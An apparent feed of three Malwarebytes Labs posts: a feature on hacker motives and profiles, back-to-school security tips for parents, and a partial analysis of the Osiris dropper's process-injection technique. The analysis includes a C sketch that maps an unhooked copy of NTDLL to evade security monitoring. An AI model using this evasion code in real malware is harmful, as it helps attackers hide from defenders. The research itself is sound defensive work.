Techie Feeds

Under the hoodie: why money, power, and ego drive hackers to cybercrime

Malwarebytes - Wed, 08/15/2018 - 14:00

Just one more hour behind the hot grill flipping burgers, and Derek* could call it a day. Under his musty hat, his hair was matted down with sweat, and his work uniform was spattered with grease. He knew he’d smell the processed meat and smoke for the next three days, even after he’d showered. But it was money, he supposed.

“Derek!” His manager slapped him on the shoulder. “A little bird told me you were good with computers. I’ve got a job for you, if you’ll take it.”

The next day, with routers and cables bought and paid for by his manager, Derek networked his boss’ entire home. After one hour of work, he was handed a crisp $100 bill. Derek made a quick calculation: He’d have to put in three full shifts at the burger joint to take home the equivalent.

Unfortunately, not all of Derek’s clients had his manager’s money. Like him, his classmates came from a modest middle-class background, and they often couldn’t afford the latest video games, DVDs, and albums. But Derek had something not even his boss had: the ability to hack.

Mostly, his classmates looked for video game hacks, like unlimited life, or access to boatloads of free music. Sometimes they needed expensive cables to set up LAN parties, and Derek could MacGyver a Cat-5 cable so that his friends only had to pay him $10, instead of the $50 they cost at Best Buy.

Sometimes, Derek took on work that was a little more dangerous or challenging—like scamming other scammers to get onto their networks and drop malware or redirecting browser traffic to personal eBay storefronts—and he proved himself adept at this type of problem solving. Everyone knew Derek was the man to go to for these things—and he liked that. What’s not to like? Money, popularity, and a quiet “screw you” to the man. He was proud of his ability to hack into and modify programs built by professionals.

“There was ego involved, of course. It was like, ‘Ha! Look what I did that I wasn’t supposed to be able to do,’” said Derek, who today works as an engineer at a security company, but sometimes still participates in less-than-legal activities online. “Some 13-year-old kid just beat a 30-year-old programmer.”

Derek’s hacking hobby soon became more than a pastime. The stars had aligned for him to step into the world of cybercrime.

What makes a cybercriminal?

Some of Derek’s actions might sound familiar to those who tapped into the early, Wild West-esque days of the Internet. Pirating and counterfeiting music, video games, and DVDs was par for the course in the mid-to-late 1990s, until the Napster lawsuit and subsequent shutdown opened the nation’s collective eyes to the fact that these actions were, in fact, unlawful.

Today, we know better. Those who can game the system are called hackers, and the term is often used interchangeably with cybercriminals. However, hackers are merely people who know how to use computers to gain access to systems or data. Many hackers do so with altruistic purpose, and they are called white hats.

White hats are considered the good guys. They’re experts in compromising computer systems, and they use their skills to help protect users and networks from a criminal breach. White hats often work as security researchers, network admins, or malware analysts, creating systems to capture and analyze malware, testing programs for vulnerabilities, and identifying weaknesses in companies’ infrastructures that could be exploited and/or infected. Their work is legal, sanctioned, and compensated (sometimes handsomely). But sometimes, even white hats can find themselves in compromising positions.

Good guys (and girl): The Malwarebytes intel team

Jared* got his start in IT as a technician, working at a mom-and-pop shop that he had frequented often when putting together his own machine. “I was a computer hobbyist,” he said. “I bought and built my first one, and I kept going to the same store for parts. Eventually, I ended up working there.”

Jared built up his skills working in the shop, eventually moving up to enterprise work at a larger chain store. It was there that he was introduced to a software developer that was making an anti-malware product designed to rip spyware out of people’s machines. He was hired on to add definitions (the code that helps antivirus programs detect malicious software).

But soon, Jared started to sense that something was off. Despite the fact that the company owners kept departments siloed—the user interface (UI) people didn’t know what the product development people were doing, and none of them knew what the marketing people were up to—Jared started asking uncomfortable, ethical questions in meetings that made him rather unpopular.

“I had the horse blinders on. I knew that there was stuff taking place that I was not comfortable with, and I chose to ignore it because it wasn’t the product I was working on,” he said. “But, that mental gymnastics got harder and harder and harder, until I finally realized that some aspects of the company I was working for were super scummy.”

What Jared came to realize after moving into a Q/A position was that he was, in fact, working for a potentially unwanted program (PUP) maker—a product created mostly to rip people off. He might not have been trying to participate in cybercrime, but he was complicit.

Despite trying to fight the corruption from the inside, Jared was stuck. He needed this job to stay financially afloat. Finally, after six years at the company, he was actively looking for a new job in IT when he was approached by a legitimate security company—and that’s where he is today. His bosses at the PUP maker, however, knew exactly what they were doing. And that’s why they’re considered black hats.

Black hats are the bad guys; the cybercriminals. They use a similar skill set as white hats, but their intentions are not to protect systems. Instead, they look to cause damage to their targets, whether that’s stealing personal data for monetary gain or coordinating attacks on businesses for revenge. Black hats’ criminal activity ranges from targeting individuals for state-sponsored espionage to widespread corporate breaches, and their efforts may be conducted from outside an organization or embedded within as an insider threat.

But the world is not black and white. A third set of hackers exists between opposite ends of the moral spectrum, and they are known as gray hats. They may not be trying to cause intentional harm, but they’re often operating outside the law. Gray hats might identify as cybervandals or rogue researchers, publicly announcing vulnerabilities to bring attention to a problem. For example, a gray hat could compromise a system without an organization’s permission, but then inform the organization after the fact in order to help them fix the problem. You might consider Jared a gray hat during his tenure at the PUP maker, even though he entered and left the establishment with the best of intentions.

What sets a cybercriminal apart from a security researcher, then, comes down to motive. Ethical hackers look to improve the security of software programs to protect users and their online experiences, whereas cybercriminals seek to undermine the integrity of those systems and programs for their own gain. It’s why people hack that shapes the nature of their being.

Putting together the profile

Since the identities of cybercriminals are usually unknown (most do a good job of covering their tracks), criminal profiling becomes a useful tool for drawing more accurate pictures of the people behind the proverbial hoodies.

Criminal profiling is a psychological assessment that includes personality and physical characteristics. “Fitting the profile” doesn’t necessarily mean a person committed the crime, but it can help narrow the field of suspects and exclude others from suspicion. Profilers use both inductive profiling (statistical data involving known behavioral patterns and demographic traits) and deductive profiling (common sense testing of hypotheses related to forensics, crime scene evidence, and victimology) to create personas of criminals. They are then able to identify criminals based on an analysis of their behavior while they engage in the crime.

Online, however, gathering this type of data can be nearly impossible. How can criminal profilers identify the crime scene, for example, when a victim might not even know how, when, or where he was infected?

According to an article in CIO, criminal profiling has a success rate of 77 percent in assisting traditional investigations. Unfortunately, no such headway has been made for cybercrime. Instead, both corporate and individual would-be victims rely on a combination of cybersecurity awareness (aka street smarts for computers) and technologies to prevent the crime from happening in the first place. These technologies include firewalls, encryption, two-factor authentication, antivirus, and other more advanced forms of cybersecurity software.

And while technology has been the main defense against cyberattacks, experts say a better understanding of the psychological, criminological, and sociological side of the equation can help fortify protection and possibly catch thieves in the act.

“Those that get caught never invest in sensible growth funds or get their families out of the country. They buy sports cars,” said William Tsing, Head of Intel Operations at Malwarebytes, whose work includes coordinating with law enforcement to take down cybercriminals. “Florida has had success getting people with outstanding warrants by the classic giveaways of sports cars and boats. These men have very specific ideas of who they’re ‘supposed’ to be, and buying expensive toys plays to their ego. They steal what they think they deserve.”

That being said, only 5 percent of cybercriminals are actually apprehended.

To better understand their psychological, criminological, and sociological motives, former police officer and IT professional Deb Shinder put together a set of characteristics she says that most cybercriminals exhibit. These include:

  • Some measure of technical knowledge
  • Disregard for the law or rationalization about why particular laws are invalid or should not apply to them
  • High tolerance for risk or the need for a “thrill factor”
  • “Control freak” nature, enjoyment in manipulating or outsmarting others
  • A motive for committing the crime—monetary gain, strong emotions, political or religious beliefs, sexual impulses, or even just boredom or the desire for fun

A generic cybercriminal profile, therefore, might look like this: “Male, under 25, history of anxiety, angry, sustained difficulties with in-person interaction, and distrustful of anything outside of science or tech,” said Tsing, who qualifies that it applies to North American and Chinese black hats only—Russian black hats likely fit a different profile.

Additional research conducted by online payment company Jumio finds that three-quarters of cybercriminals are male, and they work in organized groups, half of which have six or more members. (Though this is not to be confused with organized crime, which cybercriminals have, surprisingly, little connection with.) And they live all over the world, but are found especially in Asia, most notably China, Russia, and Indonesia.

As there are so many different forms of cybercrime, so too are there different profiles. Those who participate in online piracy have different traits from those who are scam artists, as well as from those who are involved in human trafficking or child pornography.

Types of cybercrime

The various types of cybercrime committed by black hat hackers are highly influenced by technical skill, though socio-economic factors also play a part. Those who are able to participate in cybercrime that requires higher technical expertise often come from fairly comfortable, middle-class backgrounds. Yes, there are savants—your Good Will Huntings who come from extreme poverty and are self-taught—but for the majority of cybercriminals, a base level competence in computer science is acquired at home, with private access to a computer, and at school.

“In high school, I took computer science classes. That was actually my first exposure to cybercrime and the dark world,” said Derek. As a freshman, he was in class with seniors who were already involved with less-than-legal activities, and they taught Derek how to grow his own abilities, whether that was by finding better content or achieving faster download speeds.

Personal preference and opportunity certainly play a role, but technical skill is the major factor that separates the scammers from the ransomware authors. We separate types of cybercrime (and criminals) into categories as follows:

Online piracy: We’ve covered this fairly well with Derek’s actions, but online piracy involves illegally copying and sharing copyrighted material, such as movies, video games, and music. In the US, this is an infringement on the Digital Millennium Copyright Act (DMCA), which was enacted in 1998. It doesn’t require much technical skill to do the copying and sharing of files, but it does require some basic know-how to find torrent sites that won’t infect your own machine and stay under the radar enough to avoid fines.

Malware/PUP writing: To write programs that deploy malicious code generally requires a much higher level of technical prowess, whether that’s authoring a program that can discover vulnerabilities in other software and escort malware through the door (exploits) or creating ransomware that can seize and encrypt a system’s files, holding them hostage.

Creators of potentially unwanted programs also fit under this umbrella, as they require the requisite programming skills of any software maker, with the added bonus knowledge of dark design—e.g., sneaking pre-checked boxes into end-user license agreements (EULAs) or creating extra search bars that obfuscate their true purpose, which is to redirect users to sites outside of their control.

One caveat: A lot of malware creation can now be conducted by those with lesser technical capabilities, such as script kiddies, or people that use existing computer scripts or code to hack into computers. Malware-as-a-service, then, has popped up as a profitable form of cybercrime, where black hats actually write and sell code to other black hats in place of or in addition to participating in their own attacks.

Scamming/fraud/extortion: Scamming requires little in the way of technical skill, but does rely on knowledge of classic social engineering techniques, such as exploiting fear, carelessness, or a variety of other emotions to manipulate users. Scamming in the cyberworld includes phishing attacks that seek credentials, such as usernames and passwords, and technical support scams, which dupe users into paying fake technicians to “fix” an issue in their computer that either doesn’t exist or that the technician has actually caused himself.

Those that write malware often look down upon the scammers for their lack of technical skill, and sometimes infiltrate scammer networks and drop their own viruses or worms.

“I liked causing pain to people who were trying to screw over grandma,” said Derek. “In the land of the blind, the one-eyed man is king.”

However, socio-economics probably has the largest impact on this subset of criminals. Massive caller banks have been set up in states and nations where poverty runs rampant, including Florida and India, where scammers target the mentally ill or the elderly for low-end technical support scams and vendor fraud. While seemingly vile, it puts much-needed money in the pockets of the poor.

Cyberterrorism/state-sponsored espionage: Here live those with top-of-the-line hacking aptitude, such as the ability to reverse engineer malicious code or break military-grade encryption. Once cybercriminals become good enough at their trade, they’re often snatched up by nation-states that participate in this type of cyberwarfare. (Though there are those hacktivists that work independently from their governments.) In the US, those with a background in cybercrime are not invited to the cyber table, so to speak, but they are often courted and hired by private companies as security researchers.

Child pornography/human trafficking: Sure, yes, technical skill is involved to some degree when you’re talking about this type of deviant behavior, but mostly you’re dealing with the soulless and sociopathic, here. When it comes to the deep end of this criminal pool, psychological motive is the factor that separates the truly sick from the opportunists.

What motivates a cybercriminal?

Indeed, motive is the most fascinating and also most illuminating factor that ultimately determines the full psychological profile of a cybercriminal. And while cybercriminals often have more than one motive for doing what they do, these motives can tell us the all-important why behind the hacking, as well as which type of cybercrime they’ll likely participate in.

“I didn’t brute force FTP servers as a kid because I was poor,” said Tsing. “I did it because I was bored, powerless, depressed, and smart enough to try it.”

Some of the main motives for different types of cybercrime break down as follows:

For fun/the challenge: According to a 2017 report from the National Crime Agency, 61 percent of cybercriminals begin before the age of 16. The young age of the offenders can be attributed to their access to technology and the perception that it’s a victimless crime.

“There’s a little bit of a Robin Hood complex there. I’m not saying it’s right, but I would say that for the most part, what I did was victimless crime,” said Derek of his video game hacking enterprise. “If anything, it was cheap marketing because they played the game and gave out reviews and loved the hell out of it.”

Shinder believes that many cybercriminals hack not out of malicious intent or financial benefit, but simply because they can. “They may do it to prove their skills to their peers or to themselves, they may simply be curious, or they may see it as a game,” she said.

John Draper, aka Captain Crunch (left), is one of the early pioneers of hacking.

One subject interviewed by the NCA said that illicit hacking made them popular, and they looked up to users with the best reputations. The NCA study also found that curiosity and a desire to increase skills were the most common factors that led to cybercrime. This assessment is corroborated by a recent report by Nuix, which found that 86 percent of surveyed threat actors said that they liked the challenge of hacking and hacked to learn. Additionally, 35 percent said they did it for the entertainment value or to make mischief.

If having fun or looking for a challenge is the main motive, then the buck likely stops for these budding cybercriminals at sharing copyrighted music and movies, defacing websites, or other low-impact crimes. If you combine this motive with others, however, the severity of the crime begins to increase.

Financial: Money can account for the motive behind almost all forms of cybercrime, from online piracy on down to scams and human trafficking. According to the Nuix report, 21 percent of surveyed respondents hacked for financial gain.

What pushes cybercriminals to continue down their path often amounts to putting more expendable cash in their pockets. As cybercriminals age, their financial needs change. What started as a yearning for new video games grows into wanting more cash to buy a car, date girls, and buy drinks at the bar. And often, criminals discover that their side hacking jobs pay way more than entry-level jobs in fast food or retail.

“The first time I started thinking about [hacking] for money was when I first started caring about money,” said Derek. “At 15, I started wondering how I was going to buy a car. [I was] making more than I should have been at 16-years-old—probably a couple grand a year. It was a lot more than my real job at the mall. At that point, I wasn’t thinking of stopping. Money talked.”

Cybercrime paychecks often stack up much higher against career IT jobs. For example, Jared made $45,000 a year while working for the PUP maker, which was much more than a basic computer technician could expect to make in his location and during the time he worked there. For those that are at the top of their crime field, the earnings are even higher. According to an April 2018 study by Dr. Mark McGuire, the highest-earning cybercriminals can make more than $166,000 per month, middle earners can make more than $75,000 a month, and the lowest-earning cybercriminals can still rake in more than $3,500 a month.

Still, money isn’t the only incentive for many threat actors, who prefer the anonymity and isolation of working in cybercrime over the human interaction required to work in a traditional office.

“The stated motive is always money. But that’s not necessarily true,” said Tsing. “It’s just that legit avenues to earn don’t appeal for various reasons. Often times, low level guys will make peanuts, but it’s peanuts where you don’t have to interact with others with respect, don’t have to be around women, and can take time off if you’re crippled with depression or anxiety. So, they go with $40–$60,000 selling DDoS or launching phishing attacks rather than take $75,000 in an office.”

Emotional: Shinder believes that the most destructive cybercriminals act out of emotion, whether that’s rage, revenge, “love,” or despair. This category includes ex-spouses, disgruntled or fired employees, dissatisfied customers, and feuding neighbors, to name a few. Cybercriminals motivated by emotion can often be found getting angry in forums, comments sections, and social networking groups, “trolling” users by baiting them with overly offensive, intentionally contrary content.

The emotional motive might be most personally destructive to the victims of lovers spurned. These criminals use their technical competence to cyber stalk their victims, access their accounts without authorization, or use Internet of Things (IoT) devices to commit domestic abuse, such as locking their loved ones inside the house via smart locks or cranking the heat up in the middle of the summer using Internet-controlled thermostats.

The malicious insider is another common subtype impacted by emotion. They are often upset about being overlooked for a promotion or raise, or are frustrated by a perceived injustice, which can send them on a critical path that includes defacement of company websites, DDoS attacks, stealing or destroying company data, or exposing confidential company information.

“As for the malicious insider, predispositions and professional dissatisfaction or a sense of being slighted in his job can serve as a trigger,” said certified forensic psychologist Dr. Harley Stock in an article for Dark Reading. “They move from a psychological sense of not being treated fairly to developing justification responses, giving themselves excuses to do bad behavior.”

Ego: For those involved in a variety of cybercrime, but especially social engineering attacks, shoring up a weak ego is a motivation that combines several psychological provocations, including insecurity, financial woes (and gains), and emotional turmoil into one powerful punch. In fact, if you ask Tsing, he believes ego is at the root of all cybercrime evil.

“I’d say the one overarching motive is emotional if I wanted to troll—they tend to go on at length about how they don’t have emotions. But it’s probably ego or power,” he said. “It gets confused as money, because they use money as a means to power. I think if it were actually money, though, we’d see a lot more of these folks leaving their countries of origin.”

Cybercriminals driven by a weak ego and lacking the technical skill to drop malware on their chosen targets tend to have more visibility into and interaction with their victims, and they validate those actions by convincing themselves they’re actually on the defensive, attacking “back” at those who put them in the position in the first place.

“They have such a shaky sense of self that they feel constantly under assault by essentially everyone,” said Tsing. “So, it’s not that they don’t care [about hurting others], it’s that they’re ‘getting back’ what’s theirs.”

Poor grandma. She must have been a real jerk to deserve having her identity stolen, or to field a phone call from a fake, desperate granddaughter who needed money to bail her out of jail (a real scam scenario).

Political/religious: According to the Nuix report, six percent of respondents said they hacked for social or political motives. Often associated with cyber activism/terrorism, hacktivism, and nation-state supported cybercrime, those with political or religious motivations hack with the intent to take down foreign adversaries. Shinder asserts that this particular motive is closely related to the emotional category, as people’s political and religious beliefs are often intertwined with their personal feelings. “People get very emotional about their political and religious beliefs, and are willing to commit heinous crimes in their name,” she said.

Sexual impulses/deviant behavior: Cyberpsychologist Mary Aiken, whose work was the inspiration for the TV show “CSI: Cyber,” famously joked in a 2015 Web Summit conference about the Freudian impulse that drives people to hack as “a cyber-sexual urge to penetrate.” While meant as a tongue-in-cheek poke at psychologists’ attempts to understand cybercriminals, there does exist a group in the darkest corners of the web to whom sexual compulsion and deviant behavior apply.

Although also related to emotion, those with sexual impulses are some of the most violent cybercriminals, as they commit heinous crimes using the Internet as a tool to lure in their victims. Rapists, sexual sadists, pedophiles, and even serial killers either use their own skill or hire those lacking a moral compass to help aid in their sexual predatory behaviors. Child pornographers and human traffickers also fit into this category, or they may be merely exploiting the sexual impulses of others for profit.

“I can tell you that there are people out there who just want to do harm and cause chaos. I saw some really messed up shit and decided I didn’t want to be part of it,” said Derek, who witnessed hitmen for hire, human trafficking, and bioengineering attack schemes while conducting research. “There are guys and girls out there who are ready to break people. They turn a human being’s psyche into a math problem and then subsequently solve the problem.”

Sometimes, a bad apple is just a bad apple.

What would make a cybercriminal reform?

Armed with the knowledge of what drives a cybercriminal to do what he does, we ask the question: How can we get black hats to turn into white hats? The answer shouldn’t surprise you: It’s likely the same things that made them hack in the first place. Of course, there are those that are psychopathic by nature—generally one in 100 people—and they just want to wreck the place. But others could be swayed by the following:

Money: Pay a cybercriminal well enough to work as a malware analyst, and they won’t be able to justify to the IRS where all this extra cash from cybercriminal side jobs is coming from. If you tip the balance of the risk/reward ratio, you can court many of those whose motivations are financial to the side of the light.

According to Payscale.com, the median salary of an ethical hacker is around $72,000 a year and consultants can expect to be paid $15,000 to $45,000 per assignment. However, as discovered by the recent Osterman report, medium-sized companies aren’t offering their security teams enough money right now. Salaries and retention numbers lag because their starting salaries average only $3,000 more than small companies, but $17,000 less than enterprises. In fact, the Osterman survey found that nearly 60 percent of security pros think that black hats make more money than security professionals.

How can companies fix the imbalance? Malwarebytes’ CEO Marcin Kleczynski said, “We need to up-level the need for proper security financing to the executive and board level discussions. This also means properly recognizing and rewarding the best and brightest security pros.”

Challenge: While money is a major factor for attracting cybercriminals to white hat positions, providing them with interesting and challenging work, and surrounding them with other talented researchers can keep them there.

“What really made me turn the corner was when a select group of people in the company who were known as the smartest took notice of me and the abilities I had shown, and invited me to mess around with a target,” said Derek, whose white hat work includes actively searching out criminal activity to stymie. “Being in the white hat community, I was exposed to many more skilled people. It was really good for me because it pushed me to learn so much more.”

Adrian Lamo, Kevin Mitnick, and Kevin Lee Poulsen: three former black hatters who reformed. Photographer: Matthew Griffiths

Age: Many simply grow out of this behavior. There’s a reason why security is on average older than any other IT field: It’s mostly composed of those who’ve seen the error of their ways or are looking for more stability.

“The ones that seem to think that cybercrime is victimless tend to be very young—generally, under 25, which is when the good judgement part of the brain finishes forming,” said Tsing. “You don’t see the consequences in front of you, therefore there aren’t any. Eventually, a huge amount of these guys age out of the profile and start acting like humans.”

In addition, the longer they go, the more skilled they become. The more skilled they become, the deeper waters in which they wade. Eventually, those whose consciences are alive and well will find themselves in uncomfortable positions. They’ve seen too much.

“In the wrong hands, these skills can be used to do some seriously scary shit,” said Derek. “I met a guy who had hypothesized targeting a primate gene that would effectively reset the world clock. One guy, through this tech, had the capability of watching the world burn, if he so chose…I like to think that at my core, I make the right decisions. I’m comfortable with me having the knowledge, but I know there are people out there who have a very different moral compass.”

Flipping the system: A paradigm shift in education might be one of the most difficult changes to achieve, but it also could help thwart teens with technical capability from participating on the fringes of society in the first place. Give your outside-the-box thinkers the platform to use their skills in a positive way, and they won’t be so tempted to go after the low-hanging, unscrupulous fruit.

Educational reform has been hard pressed to include 21st century learning initiatives, at least in the US, where many public schools in the K–12 system use barely-functioning tech—a single, shared iPad on a decrepit, crumbling network—and avoid topics such as digital citizenship and literacy in favor of standardized testing. For the kids already hacking video games, their classroom experience is, in Tsing’s words, “stifling and borderline traumatic.”

“At 19, I was going to community college and thought it was a joke. College was to show that you could complete a project start to finish and to build a network of people,” said Derek. “I had already learned to do that in high school with my enterprising.”

In addition, if the US government could get over its aversion to hiring former cybercriminals, there’d be a place for many more skilled individuals to do some good, especially as cybersecurity continues to be a concern surrounding our elections and infrastructure.

*******************************************************************************************

There’s a razor-thin line separating the white hats from the black. Cybercriminals are equally passionate and skilled at what they do, but the lens through which they view the world may be blurred by socio-economic circumstances or psychological hang-ups. There are those who may be beyond hope, but there are also those who are simply too young or too insecure to work a system that feels like it’s set up to watch them fail.

Give them an off-ramp from the treadmill and hand them the tools sooner for doing some good online. Then we just might be able to hold out hope that we can, in fact, make the Internet a safer place to be, without having to clutch our passwords tight.

*Names have been changed to protect the anonymity of the cybercriminals interviewed for this piece.

The post Under the hoodie: why money, power, and ego drive hackers to cybercrime appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Back to school cybersecurity: hints, tips, and links for a safer school year

Malwarebytes - Tue, 08/14/2018 - 15:00

It’s that time of year again when parents are slowly gearing up for a new school term. Some schools have a strict policy of only using their own pre-approved lab devices, while others allow students to bring their own devices. Whatever the plan, it’s never too early to start thinking about some of the potential dangers.

Following the herd

When new schoolmates collide, there’s always a mad dash to join the collective and sign up to a bunch of popular websites. I’m sure many parents are intimately familiar with the “I want to set up a YouTube channel because my friend has one” request, followed closely by your own concerns about connected accounts, public-facing settings, and whether or not little Jimmy has uploaded 30 minutes of dabbing in front of the underwear dryer.

Spend some time going over privacy basics, like avoiding recording anything too identifiable. Don’t leave letters with home addresses on them lying around in shots, or upload footage of yourself standing outside your house or across the street from well-known public locations.

Time out

Digital devices are great, but there’s no harm in admitting they can be a problematic time sink at the worst possible moments. It isn’t just schools in Australia, but schools in the UK, too, who’ve started sending out letters about the incredibly popular game Fortnite. Those letters contain everything from advice on limiting digital playtime via game console parental controls to password security basics due to scammers being quite happy to pilfer accounts, if given the chance. Almost every digital device I can think of can have some form of time restriction applied to it if need be, and parents should definitely read up on the subject.

A little vanity searching never hurt anyone

It’s not enough for your kids simply to avoid posting personally identifiable information online, either on their own accounts or on school-issued pages; they should also occasionally see what others might be saying about them. If a bully at school is able to work out your address and decides to post it online, you’d never know about it without looking. Smart searching can save the day, and help to get the offending information taken down. This may be something you choose to do yourself rather than burden the child with additional responsibilities.

Security can be fun

You don’t need to wait until school time to give your kids some security tips. In fact, it might be more advantageous for them to head into their new term with some decent computing knowledge, and it’ll certainly impress teachers at the same time. We’ve written a lot about engaging children with infosec, and our post on this very subject will be useful whether you’re a parent, educator, or both.

Kids and the written word

There are a lot of advice guides out there for parents, and though the books may not be specific to schooling, many of the tips within remain valid. Consider choosing a few titles on the subject of digital literacy, citizenship, or cybersecurity, and brush up your own knowledge on the latest issues affecting kids in cyberspace. Online popularity, social media, and (especially) anything to do with gaming should be your first port of call where learning is concerned…they’re all magnets for children and any associated problem points.

Networks and nopeworks

If the school devices are of the fixed, pre-approved types that never leave the classroom, tell your children not to save anything particularly personal to them, outside of whatever schoolwork is required. You don’t want a batch of their selfies or bad emo poetry (we’ve all done it) being stored on some obscure portion of the school network. Even if devices can be brought home, there’s a good chance they may have some sort of monitoring and/or logging functionality onboard, so it pays to be cautious and avoid potential trouble further down the line.

The same goes for student-initiated installs on the device. Whether the school has a liberal install policy or the devices are totally on lockdown, it’s probably a good idea to always ask whoever is responsible for IT before installing something. The school may have its own internal portal where safe, approved apps live. Randomly grabbing downloads from Google Play, or turning off the “no installs from unknown sources” option could give everybody involved a massive headache.

Parental monitoring

It isn’t just the school that wants to keep an eye on your children’s computer use; this may be something you want to do as well. If that’s the case, we’ve written about how you can approach the potentially tricky subject of monitoring with your kids. Remind them: with great power (unfettered access to the Internet) comes great responsibility.

School social networks

Many schools have their own social portals for their students, and they act in a similar way to more well-known services. If your child is on one of these portals, make sure they’re using a strong, unique password, and understand the security/privacy settings of the network. As above, they should avoid posting anything too identifiable, and should refrain from cyberbullying their classmates.

Laptop lockdown

On a similar note, some schools will issue devices to students and leave much of the security in the hands of the laptop recipient. If that’s the case, we’ve got you covered with some schooltime 101 security lockdown tips.

Acceptable use policies

A school network without one of these would be a rare thing, so you may wish to request a copy of the AUP and see exactly what can, or can’t, be done while using the net on school time. If your child has a habit of, er, breaking the rules, then it might be an idea to talk over any of the most important points. Nobody wants to get kicked out of school for breaking what the child might think is the silliest rule.

Ring the bell!

With our quickfire list of tips and links, both you and yours should be ready to roll when term time comes around. Going back to school can be a grind for older kids, and incredibly daunting for younger ones. Throw some technology into the mix and anything can happen, so it’s good to know a wealth of online resources exist for those willing to get their feet wet.

Speaking of, if you’d like even more advice on how to tackle tech and security concerns with your kids, take a look at Malwarebytes’ Director of Malware Intelligence Adam Kujawa’s live stream on the topic. Hint: Fast forward to about the six minute mark for the video to begin.

Unfortunately, we can’t tell you which sofa the school uniform is stuffed down, but we’re right here for all your computing-related needs. Wishing you all a productive and safe return to school!

The post Back to school cybersecurity: hints, tips, and links for a safer school year appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Process Doppelgänging meets Process Hollowing in Osiris dropper

Malwarebytes - Mon, 08/13/2018 - 18:29

One of the Holy Grails for malware authors is a perfect way to impersonate a legitimate process. That would allow them to run their malicious module under cover, unnoticed by antivirus products. Over the years, various techniques have emerged to help them get closer to this goal. This topic is also interesting for researchers and reverse engineers, as it shows creative ways of using Windows APIs.

Process Doppelgänging, a new technique of impersonating a process, was published last year at the Black Hat conference. After some time, a ransomware named SynAck was found adopting that technique for malicious purposes. Even though Process Doppelgänging still remains rare in the wild, we recently discovered some of its traits in the dropper for the Osiris banking Trojan (a new version of the infamous Kronos). After closer examination, we found out that the original technique was further customized.

Indeed, the malware authors have merged elements from both Process Doppelgänging and Process Hollowing, picking the best parts of both techniques to create a more powerful combo. In this post, we take a closer look at how Osiris is deployed on victim machines, thanks to this interesting loader.

Overview

Osiris is loaded in three steps as pictured in the diagram below:

The first stage loader is the one that was inspired by the Process Doppelgänging technique but with an unexpected twist. Finally, Osiris proper is delivered thanks to a second stage loader.

Loading additional NTDLL

When run, the initial dropper creates a new suspended process, wermgr.exe.

Looking into the modules loaded within the injector’s process space, we can see this additional copy of NTDLL:

This is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they use. When we closely examine what functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. It was easy to guess that the technique of Process Doppelgänging, which relies on this mechanism, was applied here.

NTDLL is a special, low-level DLL. Basically, it is just a wrapper around syscalls. It does not have any dependencies on other DLLs in the system. Thanks to this, it can be loaded conveniently, without the need to fill its import table.

Other system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check if the process does not display any suspicious activity.

Of course, malware authors know about this, so sometimes, in order to fool this mechanism, they load their own fresh, unhooked copy of NTDLL from disk. There are several ways to implement this. Let’s have a look at how the authors of the Osiris dropper did it.

Looking at the memory mapping, we see that the additional NTDLL is loaded as an image, just like other DLLs. This type of mapping is typical for DLLs loaded by the LoadLibrary function or its low-level version from NTDLL, LdrLoadDll. But NTDLL is loaded by default in every executable, and loading the same DLL twice is impossible via the official API.

Usually, malware authors decide to map the second copy manually, but that gives a different mapping type and stands out from the normally-loaded DLLs. Here, the authors made a workaround: they loaded the file as a section, using the following functions:

  • ntdll.NtCreateFile – to open the ntdll.dll file
  • ntdll.NtCreateSection – to create a section out of this file
  • ntdll.ZwMapViewOfSection – to map this section into the process address space

This was a smart move because the DLL is mapped as an image, so it looks like it was loaded in a typical way.

This DLL was further used to make the payload injection more stealthy. With their own fresh copy of NTDLL, the authors could be sure that the functions they called from it were not hooked by security products.
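To make the trick more concrete, here is a minimal sketch (in C, with simplified error handling) of mapping a module as an image section using the three calls listed above. The function and variable names are our own, the native calls are resolved from the already-loaded NTDLL via GetProcAddress, and CreateFileW stands in for the dropper’s direct NtCreateFile call—this illustrates the technique, it is not the dropper’s actual code.

#include <windows.h>
#include <winternl.h>

// Prototypes for the native calls used; ntdll exports them, but the SDK headers
// do not declare all of them.
typedef NTSTATUS (NTAPI *NtCreateSection_t)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES,
                                            PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS (NTAPI *NtMapViewOfSection_t)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T,
                                               PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);

// Map a second, fresh copy of ntdll.dll so that it shows up as an "Image" mapping.
PVOID map_fresh_ntdll(void)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    NtCreateSection_t pNtCreateSection =
        (NtCreateSection_t)GetProcAddress(ntdll, "NtCreateSection");
    NtMapViewOfSection_t pNtMapViewOfSection =
        (NtMapViewOfSection_t)GetProcAddress(ntdll, "NtMapViewOfSection");

    // 1. Open the file on disk (the dropper calls ntdll.NtCreateFile directly).
    HANDLE hFile = CreateFileW(L"C:\\Windows\\System32\\ntdll.dll", GENERIC_READ,
                               FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return NULL;

    // 2. Create a section backed by that file. SEC_IMAGE makes the memory manager
    //    lay it out exactly like a normally loaded DLL.
    HANDLE hSection = NULL;
    NTSTATUS status = pNtCreateSection(&hSection, SECTION_MAP_READ | SECTION_MAP_EXECUTE,
                                       NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile);
    CloseHandle(hFile);
    if (status < 0) return NULL;   // NT_SUCCESS means status >= 0

    // 3. Map the section into our own process; the view appears with the "Image"
    //    mapping type, just like an ordinary module.
    PVOID base = NULL;
    SIZE_T viewSize = 0;
    status = pNtMapViewOfSection(hSection, GetCurrentProcess(), &base, 0, 0,
                                 NULL, &viewSize, 1 /* ViewShare */, 0, PAGE_READONLY);
    return (status < 0) ? NULL : base;
}

From a view obtained this way, the dropper can resolve the exports it needs instead of going through the (potentially hooked) copy loaded at process start.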

Comparison with Process Doppelgänging and Process Hollowing

The way in which the loader injects the payload into a new process displays some significant similarities with Process Doppelgänging. However, if we analyze it very carefully, we can also see differences from the classic implementation proposed last year at Black Hat. The differing elements are closer to Process Hollowing.

